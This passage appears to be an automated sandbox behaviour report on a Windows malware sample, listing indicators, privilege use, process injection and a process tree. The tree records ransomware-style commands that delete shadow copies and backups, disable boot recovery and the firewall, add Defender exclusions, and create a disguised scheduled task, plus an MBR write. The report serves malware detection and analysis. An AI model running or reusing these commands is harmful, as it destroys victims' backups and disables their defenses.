Explorer.EXE 4468 _cG.exe 4468 _cG.exe 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 4468 _cG.exe 4468 _cG.exe 3184 Explorer.EXE 3184 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
smss.exepid process 3184 smss.exe -
Suspicious behavior: LoadsDriver 64 IoCs
Processes:
pid process 2536 2716 2876 2800 1668 1976 2056 4732 168 2756 2924 4352 1384 2968 2108 4700 2896 3332 3696 3420 3744 3364 3896 3380 3428 3740 4772 3460 5076 284 4512 764 4392 1072 1224 2400 2708 4080 532 4128 1052 1800 4744 2144 4836 4956 620 972 716 4424 268 3944 4824 4876 4380 96 2504 4896 384 280 3816 4368 924 4976 -
Suspicious behavior: MapViewOfSection 33 IoCs
Processes:
y853e.exeExplorer.EXEsmss.exesmss.exepid process 5024 y853e.exe 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe 3968 smss.exe 3968 smss.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe_cG.exey853e.exe_cG.exe_cG.exevssvc.exeWMIC.exeExplorer.EXEwbengine.exeACF4.exeB283.exesmss.exedescription pid process Token: SeDebugPrivilege 4104 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe Token: SeDebugPrivilege 1224 _cG.exe Token: SeDebugPrivilege 1232 y853e.exe Token: SeDebugPrivilege 5052 _cG.exe Token: SeDebugPrivilege 4468 _cG.exe Token: SeBackupPrivilege 2576 vssvc.exe Token: SeRestorePrivilege 2576 vssvc.exe Token: SeAuditPrivilege 2576 vssvc.exe Token: SeIncreaseQuotaPrivilege 2108 WMIC.exe Token: SeSecurityPrivilege 2108 WMIC.exe Token: SeTakeOwnershipPrivilege 2108 WMIC.exe Token: SeLoadDriverPrivilege 2108 WMIC.exe Token: SeSystemProfilePrivilege 2108 WMIC.exe Token: SeSystemtimePrivilege 2108 WMIC.exe Token: SeProfSingleProcessPrivilege 2108 WMIC.exe Token: SeIncBasePriorityPrivilege 2108 WMIC.exe Token: SeCreatePagefilePrivilege 2108 WMIC.exe Token: SeBackupPrivilege 2108 WMIC.exe Token: SeRestorePrivilege 2108 WMIC.exe Token: SeShutdownPrivilege 2108 WMIC.exe Token: SeDebugPrivilege 2108 WMIC.exe Token: SeSystemEnvironmentPrivilege 2108 WMIC.exe Token: SeRemoteShutdownPrivilege 2108 WMIC.exe Token: SeUndockPrivilege 2108 WMIC.exe Token: SeManageVolumePrivilege 2108 WMIC.exe Token: 33 2108 WMIC.exe Token: 34 2108 WMIC.exe Token: 35 2108 WMIC.exe Token: 36 2108 WMIC.exe Token: SeIncreaseQuotaPrivilege 2108 WMIC.exe Token: SeSecurityPrivilege 2108 WMIC.exe Token: SeTakeOwnershipPrivilege 2108 WMIC.exe Token: SeLoadDriverPrivilege 2108 WMIC.exe Token: SeSystemProfilePrivilege 2108 WMIC.exe Token: SeSystemtimePrivilege 2108 WMIC.exe Token: SeProfSingleProcessPrivilege 2108 WMIC.exe Token: SeIncBasePriorityPrivilege 2108 WMIC.exe Token: SeCreatePagefilePrivilege 2108 WMIC.exe Token: SeBackupPrivilege 2108 WMIC.exe Token: SeRestorePrivilege 2108 WMIC.exe Token: SeShutdownPrivilege 2108 WMIC.exe Token: SeDebugPrivilege 2108 WMIC.exe Token: SeSystemEnvironmentPrivilege 2108 WMIC.exe Token: SeRemoteShutdownPrivilege 2108 WMIC.exe Token: SeUndockPrivilege 2108 WMIC.exe Token: SeManageVolumePrivilege 2108 WMIC.exe Token: 33 2108 WMIC.exe Token: 34 2108 WMIC.exe Token: 35 2108 WMIC.exe Token: 36 2108 WMIC.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeBackupPrivilege 1152 wbengine.exe Token: SeRestorePrivilege 1152 wbengine.exe Token: SeSecurityPrivilege 1152 wbengine.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeDebugPrivilege 3356 ACF4.exe Token: SeDebugPrivilege 4812 B283.exe Token: SeShutdownPrivilege 3184 smss.exe Token: SeCreatePagefilePrivilege 3184 smss.exe Token: SeShutdownPrivilege 3184 smss.exe Token: SeCreatePagefilePrivilege 3184 smss.exe Token: SeShutdownPrivilege 3184 smss.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
smss.exesmss.exepid process 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe 1908 smss.exe -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
smss.exepid process 3184 smss.exe 3184 smss.exe 3184 smss.exe 3184 smss.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe_cG.exey853e.exe_cG.exe_cG.execmd.execmd.exeExplorer.EXEACF4.exedescription pid process target process PID 4104 wrote to memory of 2504 4104 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe PID 4104 wrote to memory of 2504 4104 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe PID 4104 wrote to memory of 2504 4104 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe PID 4104 wrote to memory of 2504 4104 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe PID 4104 wrote to memory of 2504 4104 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe PID 4104 wrote to memory of 2504 4104 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe PID 4104 wrote to memory of 2504 4104 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe PID 4104 wrote to memory of 2504 4104 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe PID 2504 wrote to memory of 1872 2504 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe certreq.exe PID 2504 wrote to memory of 1872 2504 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe certreq.exe PID 2504 wrote to memory of 1872 2504 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe certreq.exe PID 2504 wrote to memory of 1872 2504 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe certreq.exe PID 1224 wrote to memory of 4468 1224 _cG.exe _cG.exe PID 1224 wrote to memory of 4468 1224 _cG.exe _cG.exe PID 1224 wrote to memory of 4468 1224 _cG.exe _cG.exe PID 1224 wrote to memory of 4468 1224 _cG.exe _cG.exe PID 1224 wrote to memory of 4468 1224 _cG.exe _cG.exe PID 1224 wrote to memory of 4468 1224 _cG.exe _cG.exe PID 1224 wrote to memory of 4468 1224 _cG.exe _cG.exe PID 1224 wrote to memory of 4468 1224 _cG.exe _cG.exe PID 1224 wrote to memory of 4468 1224 _cG.exe _cG.exe PID 1224 wrote to memory of 4468 1224 _cG.exe _cG.exe PID 1232 wrote to memory of 5024 1232 y853e.exe y853e.exe PID 1232 wrote to memory of 5024 1232 y853e.exe y853e.exe PID 1232 wrote to memory of 5024 1232 y853e.exe y853e.exe PID 1232 wrote to memory of 5024 1232 y853e.exe y853e.exe PID 1232 wrote to memory of 5024 1232 y853e.exe y853e.exe PID 1232 wrote to memory of 5024 1232 y853e.exe y853e.exe PID 5052 wrote to memory of 3796 5052 _cG.exe _cG.exe PID 5052 wrote to memory of 3796 5052 _cG.exe _cG.exe PID 5052 wrote to memory of 3796 5052 _cG.exe _cG.exe PID 5052 wrote to memory of 3796 5052 _cG.exe _cG.exe PID 5052 wrote to memory of 3796 5052 _cG.exe _cG.exe PID 5052 wrote to memory of 3796 5052 _cG.exe _cG.exe PID 5052 wrote to memory of 3796 5052 _cG.exe _cG.exe PID 5052 wrote to memory of 3796 5052 _cG.exe _cG.exe PID 5052 wrote to memory of 3796 5052 _cG.exe _cG.exe PID 5052 wrote to memory of 3796 5052 _cG.exe _cG.exe PID 4468 wrote to memory of 5032 4468 _cG.exe cmd.exe PID 4468 wrote to memory of 5032 4468 _cG.exe cmd.exe PID 4468 wrote to memory of 3172 4468 _cG.exe cmd.exe PID 4468 wrote to memory of 3172 4468 _cG.exe cmd.exe PID 5032 wrote to memory of 4680 5032 cmd.exe vssadmin.exe PID 5032 wrote to memory of 4680 5032 cmd.exe vssadmin.exe PID 3172 wrote to memory of 808 3172 cmd.exe netsh.exe PID 3172 wrote to memory of 808 3172 cmd.exe netsh.exe PID 5032 wrote to memory of 2108 5032 cmd.exe WMIC.exe PID 5032 wrote to memory of 2108 5032 cmd.exe WMIC.exe PID 3172 wrote to memory of 1412 3172 cmd.exe netsh.exe PID 3172 wrote to memory of 1412 3172 cmd.exe netsh.exe PID 5032 wrote to memory of 3512 5032 cmd.exe bcdedit.exe PID 5032 wrote to memory of 3512 5032 cmd.exe bcdedit.exe PID 5032 wrote to memory of 3560 5032 cmd.exe bcdedit.exe PID 5032 wrote to memory of 3560 5032 cmd.exe bcdedit.exe PID 5032 wrote to memory of 4632 5032 cmd.exe wbadmin.exe PID 5032 wrote to memory of 4632 5032 cmd.exe wbadmin.exe PID 3184 wrote to memory of 3356 3184 Explorer.EXE ACF4.exe PID 3184 wrote to memory of 3356 3184 Explorer.EXE ACF4.exe PID 3184 wrote to memory of 3356 3184 Explorer.EXE ACF4.exe PID 3356 wrote to memory of 4512 3356 ACF4.exe ACF4.exe PID 3356 wrote to memory of 4512 3356 ACF4.exe ACF4.exe PID 3356 wrote to memory of 4512 3356 ACF4.exe ACF4.exe PID 3356 wrote to memory of 1740 3356 ACF4.exe ACF4.exe PID 3356 wrote to memory of 1740 3356 ACF4.exe ACF4.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:648
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:1028
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1200
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2420
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Users\Admin\AppData\Local\Temp\6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe"C:\Users\Admin\AppData\Local\Temp\6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Users\Admin\AppData\Local\Temp\6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exeC:\Users\Admin\AppData\Local\Temp\6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\system32\certreq.exe"C:\Windows\system32\certreq.exe"2⤵
- Deletes itself
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1872 -
C:\Users\Admin\AppData\Local\Temp\ACF4.exeC:\Users\Admin\AppData\Local\Temp\ACF4.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Users\Admin\AppData\Local\Temp\ACF4.exeC:\Users\Admin\AppData\Local\Temp\ACF4.exe3⤵
- Executes dropped EXE
PID:4512 -
C:\Users\Admin\AppData\Local\Temp\ACF4.exeC:\Users\Admin\AppData\Local\Temp\ACF4.exe3⤵
- Executes dropped EXE
PID:1740 -
C:\Users\Admin\AppData\Local\Temp\B283.exeC:\Users\Admin\AppData\Local\Temp\B283.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4812 -
C:\Users\Admin\AppData\Local\Temp\B283.exe"C:\Users\Admin\AppData\Local\Temp\B283.exe"3⤵
- Executes dropped EXE
PID:1740 -
C:\Users\Admin\AppData\Local\Temp\BE8A.exeC:\Users\Admin\AppData\Local\Temp\BE8A.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:316 -
C:\Users\Admin\AppData\Local\Temp\E9B2.exeC:\Users\Admin\AppData\Local\Temp\E9B2.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:4288 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:3792 -
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:1476
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4816
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:1116
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:1712
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:700
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:3336
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4220
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4432
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:808
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:224
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:216
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:272
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:3928
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:3000
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:3968
-
C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\svchost.exeC:\Users\Admin\AppData\Local\Temp\2DDC.tmp\svchost.exe -debug3⤵PID:1908
-
C:\Windows\SysWOW64\ctfmon.exectfmon.exe4⤵PID:1160
-
C:\Windows\SysWOW64\ctfmon.exectfmon.exe4⤵PID:4716
-
C:\Windows\SYSTEM32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\aa_nts.dll",run4⤵PID:2864
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:3780
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4656 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4840 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2504 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3356 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1492 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4000
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:1428
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:3552
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:2952
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:544
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:1044
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#sqltdrz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:528
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:1796
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1404
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1396
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1376
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:1504
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:952
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:872
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1260
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1192
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1100
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
PID:1092
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:376
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:448
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:904
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:728
-
C:\Users\Admin\AppData\Local\Microsoft\_cG.exe"C:\Users\Admin\AppData\Local\Microsoft\_cG.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Users\Admin\AppData\Local\Microsoft\_cG.exeC:\Users\Admin\AppData\Local\Microsoft\_cG.exe2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Users\Admin\AppData\Local\Microsoft\_cG.exe"C:\Users\Admin\AppData\Local\Microsoft\_cG.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Users\Admin\AppData\Local\Microsoft\_cG.exeC:\Users\Admin\AppData\Local\Microsoft\_cG.exe4⤵
- Executes dropped EXE
PID:3796 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:4680 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2108 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:3512 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
PID:3560 -
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet4⤵
- Deletes backup catalog
PID:4632 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
PID:808 -
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=disable4⤵
- Modifies Windows Firewall
PID:1412 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:1456
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:948
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:4928
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "F:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:820
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵PID:4780
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:3192 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:148
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:672 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
PID:3560 -
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet4⤵
- Deletes backup catalog
PID:4940
-
C:\Users\Admin\AppData\Local\Microsoft\y853e.exe"C:\Users\Admin\AppData\Local\Microsoft\y853e.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Users\Admin\AppData\Local\Microsoft\y853e.exeC:\Users\Admin\AppData\Local\Microsoft\y853e.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5024
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1152
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4356
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:3536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:3356
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 592 -s 9241⤵
- Program crash
PID:4332
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 992 -s 25361⤵
- Program crash
PID:4264
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000002e8 000000801⤵PID:3336
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000002dc 000000801⤵PID:4816
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000001c0 000000801⤵PID:4432
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000148 000000801⤵PID:808
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000144 000000801⤵PID:224
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000158 000000801⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3184
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000160 000000801⤵PID:2504
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000200 000000801⤵PID:992
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000001ac 000000801⤵PID:3552
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 0000020c 000000801⤵PID:3000
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000258 000000801⤵PID:3928
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 0000028c 000000801⤵PID:272
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000290 000000801⤵PID:948
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000002a0 000000801⤵
- Loads dropped DLL
PID:2864
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000294 000000801⤵PID:4656
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000002a0 000000801⤵PID:1044
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000270 000000801⤵PID:4780
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 0000026c 000000801⤵PID:3560
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000001f4 000000801⤵PID:672
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000150 000000801⤵
- Suspicious behavior: MapViewOfSection
PID:3968
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000100 000000801⤵PID:820
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000188 000000801⤵PID:1492
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000170 000000801⤵PID:1008
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000130 000000801⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of FindShellTrayWindow
PID:1908
-
